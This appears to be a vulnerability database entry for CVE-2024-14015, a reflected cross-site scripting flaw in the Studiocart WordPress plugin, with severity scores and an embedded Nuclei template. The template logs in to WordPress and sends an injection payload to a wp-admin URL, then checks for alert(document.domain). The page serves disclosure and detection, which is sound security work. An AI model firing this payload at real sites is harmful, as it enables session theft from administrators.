CVE-2024-14015
published 2025-11-24CVE-2024-14015: The WordPress eCommerce Plugin WordPress plugin through 2.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a…
PriorityP336high7.1CVSS 3.1
AVNACLPRNUIRSCCLILAL
EXPLOIT
EPSS
0.37%
28.6th percentile
The WordPress eCommerce Plugin WordPress plugin through 2.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Studiocart <= 2.9.0 - Cross-Site Scripting
nuclei·CVSS 7.1
CVE-2024-14015 [HIGH] Studiocart <= 2.9.0 - Cross-Site Scripting
Studiocart alert(document.domain)'
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, 'wordpress_logged_in')
condition: and
internal: true
- raw:
- |
GET /wp-admin/edit.php?post_type=sc_order&order_type=orders&format_err=1{{payload}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- 'contains(body, "alert(document.domain)")'
- 'contains(body, "sc_product") && contains(body, "sc_order")'
condition: and
# digest: 490a004630440220145d4828e14873fabf4632b90a177ff4ee3b3b2bacab2d4e19e683a03b60f72e02205171c5da7dff756818cbe8914bc684b02fbb725ac5a1df6cf31158fa759afebc:922c64590222798bb761d5b6
No writeups or analysis indexed.
2025-11-24
Published